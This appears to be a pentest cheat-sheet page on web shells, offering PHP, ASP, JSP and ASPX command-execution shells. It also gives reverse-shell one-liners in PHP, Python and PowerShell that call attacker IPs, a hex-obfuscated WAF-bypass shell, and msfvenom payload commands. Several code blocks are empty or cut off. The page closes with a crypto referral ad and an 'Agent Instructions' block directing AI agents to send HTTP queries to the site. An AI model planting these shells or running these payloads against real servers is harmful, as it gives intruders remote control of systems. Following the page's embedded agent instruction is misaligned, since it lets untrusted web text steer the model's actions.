PHP Code with HTML

# Web Shell ## References {% embed url="" %} {% embed url="" %} {% content-ref url="/pages/h0xVjlLW3ybTWHQI8Kct" %} [Bind and Reverse Shell](/0xss0rz/pentest/shells/bind-and-reverse-shell.md) {% endcontent-ref %} {% embed url="" %} ## Tools ### Onelin3r {% embed url="" %} ``` pip install one-lin3r ```

### LazyShell

{% embed url="" %} ## Webroot | Web Server | Default Webroot | | ---------- | ---------------------- | | `Apache` | /var/www/html/ | | `Nginx` | /usr/local/nginx/html/ | | `IIS` | c:\inetpub\wwwroot\| | | `XAMPP` | C:\xampp\htdocs\| | ## Custom shells ### PHP #### Linux ```php ``` ``` http://SERVER_IP:PORT/uploads/shell.php?cmd=id ``` ```php " . shell_exec($_GET["cmd"]) . ""; ?> ``` #### Windows ``` ``` #### Reverse shell - Linux ``` & /dev/tcp/10.10.14.2/1234 0>&1'"); ?> ``` ``` php -r '$s=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");' ``` ``` php -r '$s=fsockopen("",);shell_exec("/bin/sh -i <&3 >&3 2>&3");' ``` ``` php -r '$s=fsockopen("",);`/bin/sh -i <&3 >&3 2>&3`;' ``` ``` php -r '$s=fsockopen("",);system("/bin/sh -i <&3 >&3 2>&3");' ``` ``` php -r '$s=fsockopen("",);popen("/bin/sh -i <&3 >&3 2>&3", "r");' ``` With Base 64 - Decode, change IP PORT, encode, change payload ``` PHP Code with HTML ``` Ref: Or upload simple shell and use rs oneliner, for example: {% content-ref url="/pages/h0xVjlLW3ybTWHQI8Kct" %} [Bind and Reverse Shell](/0xss0rz/pentest/shells/bind-and-reverse-shell.md) {% endcontent-ref %} * with python (Linux) ``` 10.10.10.185/images/blank.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.90%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 ``` * with powershell (Windows) ``` ?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27%27%2C%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22 ``` ### PHP - Bypass IDS / WAF ``` ``` Hex decode: ``` if($x_=$_GET[0]){system($x_);} ``` ### ASP ```asp <% eval request('cmd') %> ``` ### With msfvenom ```shell-session msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php ``` ## Webshells collection {% embed url="" %} ## SecLists Webshells ``` ls /opt/seclists/Web-Shells/ backdoor_list.txt CFM FuzzDB JSP laudanum-1.0 Magento PHP Vtiger WordPress ``` ## Laudanum repo {% embed url="" %}

``` cp /opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx . ``` * Modify the shell for use

## PHP ``` [Apr 08, 2024 - 03:50:25 (EDT)] exegol-CPTS /workspace # locate cmd.php /opt/seclists/Web-Shells/FuzzDB/cmd.php [Apr 08, 2024 - 03:51:51 (EDT)] exegol-CPTS /workspace # locate shell.php /opt/seclists/Web-Shells/PHP/another-obfuscated-phpshell.php /opt/seclists/Web-Shells/PHP/obfuscated-phpshell.php /opt/seclists/Web-Shells/WordPress/plugin-shell.php /opt/seclists/Web-Shells/laudanum-1.0/php/php-reverse-shell.php /opt/seclists/Web-Shells/laudanum-1.0/php/shell.php /opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php /opt/seclists/Web-Shells/laudanum-1.0/wordpress/templates/shell.php ``` ```php echo '' > /var/www/html/shell.php ``` `?cmd=id` ```shell-session curl http://SERVER_IP:PORT/shell.php?cmd=id ``` {% embed url="" %} ### p0wny shell {% hint style="success" %} *Automate the bypass of php functions restriction (as system, etc.)* {% endhint %} Works on Linux and Windows {% embed url="" %}

### PHPBash {% embed url="" %}

### wwwolf's PHP web shell

{% embed url="" %} ### C99 Webshell {% embed url="" %} ### PentestMonkey - Reverse shell {% embed url="" %} ## JSP ``` [Apr 08, 2024 - 03:50:32 (EDT)] exegol-CPTS /workspace # locate cmd.jsp /opt/seclists/Web-Shells/FuzzDB/cmd.jsp /opt/seclists/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp /opt/tools/SSRFmap/data/cmd.jsp /opt/tools/clusterd/src/lib/resources/cmd.jsp Apr 08, 2024 - 03:52:01 (EDT)] exegol-CPTS /workspace # locate shell.jsp /opt/seclists/Web-Shells/JSP/simple-shell.jsp ``` ```jsp <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ``` ## ASP ``` [Apr 08, 2024 - 03:51:48 (EDT)] exegol-CPTS /workspace # locate shell.asp /opt/seclists/Web-Shells/laudanum-1.0/asp/shell.asp ``` ```asp <% eval request("cmd") %> ``` {% embed url="" %} ## ASPX ``` [Apr 08, 2024 - 03:49:48 (EDT)] exegol-CPTS /workspace # locate cmd.aspx /opt/seclists/Web-Shells/FuzzDB/cmd.aspx [Apr 08, 2024 - 03:51:08 (EDT)] exegol-CPTS /workspace # locate shell.aspx /opt/seclists/Web-Shells/laudanum-1.0/aspx/shell.aspx ``` ### Metasploit ```shell-session $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of aspx file: 2819 bytes ``` ```shell-session msf6 exploit(multi/handler) > set LHOST 10.10.14.5 LHOST => 10.10.14.5 msf6 exploit(multi/handler) > set LPORT 1337 LPORT => 1337 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.14.5:1337 ``` ### [Laudanum repo](#laudanum-repo) ### Webshell9 {% embed url="" %}

### Antak WebShell {% embed url="" %} Modify the shell for use

### SharPyShell - Tiny and obfuscated ASP.NET webshell {% embed url="" %} ``` python3 SharPyShell.py generate -p somepassword ``` ``` python3 SharPyShell.py interact -u -p somepassword ``` {% embed url="" %} ## WAR ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=443 -f war > shell.war ``` ``` msfvenom -p java/shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war ``` `msf6 exploit(multi/handler)` {% embed url="" %} ## Tomcat (8080) {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Shell ++ {% content-ref url="/pages/16bwEEpyWa92Oc6gtbya" %} [TTY Upgrade](/0xss0rz/pentest/shells/tty-upgrade.md) {% endcontent-ref %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/shells/web-shell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.